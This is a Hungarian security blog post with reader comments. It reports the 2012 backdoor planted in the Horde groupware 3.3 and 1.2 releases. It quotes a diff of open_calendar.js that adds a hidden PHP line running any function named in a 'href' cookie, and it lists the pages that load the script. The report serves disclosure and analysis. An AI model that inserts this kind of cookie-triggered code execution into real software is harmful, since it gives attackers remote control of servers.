Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Hátsó kaput építettek a Horde-ba

2012.02.15. 15:55 | buherator | 4 komment

A Horde csoportmunka szoftver fejlesztői híreiben tegnap közölték, hogy támadás érte a horde.org tárolóit, és távoli kódfuttatásra alkalmas hátsó kaput helyeztek el a szoftverben. Az incidens a 3.3-as és 1.2-es verziókat érintette egészen tavaly november 15-től kezdődően. A legfrissebb, 4-es verzióhoz a támadók nem nyúltak. 

Eric Romang rövid összefoglalót közölt a hátsó kapuról. Eszerint a rosszindulatú kódrészletet a templates/javascript/open_calendar.js szkriptbe rejtették:

diff -u open_calendar.js.orig open_calendar.js.backdoor 
--- open_calendar.js.orig 2012-02-14 22:50:33.143182985 +0100
+++ open_calendar.js.backdoor 2012-02-14 22:49:59.143183225 +0100
@@ -274,7 +274,7 @@
cell = document.createElement('TD');
cell.className = 'rightAlign';
link = document.createElement('A');
- link.href = '#';
+ link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
link.innerHTML = '&raquo;';
link.onclick = function()
{

Amennyiben tehát egy látogatónál be van állítva egy href nevű süti, melyben egy "függvénynév:paraméter" formátumú sztring található, a fügvény az adott paraméterekkel lefut (pl. "system:id"). A megpatkolt szkript a segítség nyitóoldalán (/services/help/index.php), a jelszóemlékeztető és -változtató felületeken (/services/(change|reset)password.php), valamint az install szkriptben (/admin/setup/index.php) töltődik be

Címkék: incidens backdoor horde

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

sebcsaba 2012.02.15. 17:29:19

de hiszen ez egy js fájl... ezt még áteresztik a php-n? vagy valaki az url-ben kapott fragment-részt hajtja végre? na jó, inkább nem is akarok tudni róla...

buherator · http://buhera.blog.hu 2012.02.15. 17:56:23

@sebcsaba: Az addScriptFile() átnyomja a /services/javascript.php-n, jó mi? :)

Hunger 2012.02.15. 18:08:17

Nice.

A js közvetlenül nem is elérhető, mert az egész templates könyvtárra "deny from all" van rakva. Secure by Default!

Elvégre egy közvetlenül elérhető js file sok galádságra képes... :)